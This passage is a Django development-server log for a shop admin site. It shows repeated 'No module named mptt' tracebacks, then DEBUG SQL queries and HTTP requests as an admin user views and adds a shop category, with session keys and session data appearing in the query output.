"/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from mptt.models import MPTTModel, TreeForeignKey ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... December 05, 2019 - 09:10:48 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from mptt.models import MPTTModel, TreeForeignKey ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from mptt.models import MPTTModel, TreeForeignKey ModuleNotFoundError: No module named 'mptt' /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Watching for file changes with StatReloader Watching for file changes with StatReloader Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-05 09:14:21,807 utils 28610 139878723102464 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 09:14:21,811 utils 28610 139878723102464 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-05 09:14:21,985 utils 28612 140690211514112 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 09:14:21,990 utils 28612 140690211514112 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-05 09:14:22,006 utils 28611 140519584478976 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 09:14:22,012 utils 28611 140519584478976 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-05 09:14:22,293 utils 28616 140590390556416 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 09:14:22,298 utils 28616 140590390556416 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-05 09:14:27,015 utils 28610 139878622488320 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:26.999032+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 26, 999032, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:27,020 utils 28610 139878622488320 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:14:27,139 utils 28610 139878622488320 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 09:14:27,144 utils 28610 139878622488320 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:14:27.141607+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 14, 27, 141607, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:14:27] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 09:14:28,991 utils 28610 139878622488320 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:28.980777+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 28, 980777, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:28,995 utils 28610 139878622488320 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:14:29,041 utils 28610 139878622488320 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 09:14:29,045 utils 28610 139878622488320 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:14:29.043011+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 14, 29, 43011, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:14:29] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 09:14:31,376 utils 28610 139878622488320 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:31.362116+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 31, 362116, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:31,380 utils 28610 139878622488320 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:14:31,385 utils 28610 139878622488320 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:14:31,386 utils 28610 139878622488320 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:14:31,394 utils 28610 139878622488320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-05 09:14:31,460 utils 28610 139878622488320 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:14:31.458106+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 14, 31, 458106, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:14:31] "GET /shop/category/ HTTP/1.0" 200 3132 [05/Dec/2019 09:14:31] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-12-05 09:14:31,763 utils 28610 139878622488320 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:31.750599+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 31, 750599, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:31,767 utils 28610 139878622488320 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:14:31] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [05/Dec/2019 09:14:31] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 09:14:31] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [05/Dec/2019 09:14:31] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [05/Dec/2019 09:14:31] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [05/Dec/2019 09:14:32] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [05/Dec/2019 09:14:32] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [05/Dec/2019 09:14:32] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [05/Dec/2019 09:14:32] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [05/Dec/2019 09:14:33] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-05 09:14:36,325 utils 28610 139878608238336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:36.317106+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 36, 317106, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:36,329 utils 28610 139878608238336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:14:36,341 utils 28610 139878608238336 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-05 09:14:36,394 utils 28610 139878608238336 (0.002) DECLARE "_django_curs_139878608238336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-05 09:14:36,443 utils 28610 139878608238336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:14:36.439807+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 14, 36, 439807, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:14:36] "GET /shop/category/add/ HTTP/1.0" 200 6648 [05/Dec/2019 09:14:36] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 DEBUG 2019-12-05 09:14:36,706 utils 28610 139878608238336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:36.696763+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 36, 696763, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:36,709 utils 28610 139878608238336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 09:14:36] "GET /jsi18n/ HTTP/1.0" 200 3223 [05/Dec/2019 09:14:36] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [05/Dec/2019 09:14:36] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [05/Dec/2019 09:14:36] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 DEBUG 2019-12-05 09:14:54,184 utils 28610 139878622488320 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:54.169674+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 54, 169674, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:54,188 utils 28610 139878622488320 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:14:54,199 utils 28610 139878622488320 (0.002) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Fire' LIMIT 1; args=('Fire',) DEBUG 2019-12-05 09:14:54,206 utils 28610 139878622488320 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Fire' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('Fire',) DEBUG 2019-12-05 09:14:54,209 utils 28610 139878622488320 (0.001) SELECT MAX("shop_category"."tree_id") AS "tree_id__max" FROM "shop_category"; args=() DEBUG 2019-12-05 09:14:54,213 utils 28610 139878622488320 (0.002) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('Fire', NULL, '', '', 'fire', 1, 2, 1, 0) RETURNING "shop_category"."id"; args=('Fire', None, '', '', 'fire', 1, 2, 1, 0) DEBUG 2019-12-05 09:14:54,217 utils 28610 139878622488320 (0.002) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-05T09:14:54.213972+00:00'::timestamptz, 6, 8, '1', 'Fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 5, 9, 14, 54, 213972, tzinfo=), 6, 8, '1', 'Fire', 1, '[{"added": {}}]') [05/Dec/2019 09:14:54] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-05 09:14:54,474 utils 28610 139878622488320 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T09:14:54.464351+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 9, 14, 54, 464351, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 09:14:54,476 utils 28610 139878622488320 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 09:14:54,479 utils 28610 139878622488320 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:14:54,480 utils 28610 139878622488320 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 09:14:54,485 utils 28610 139878622488320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-05 09:14:54,558 utils 28610 139878622488320 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T09:14:54.556320+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 9, 14, 54, 556320, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 09:14:54] "GET /shop/category/ 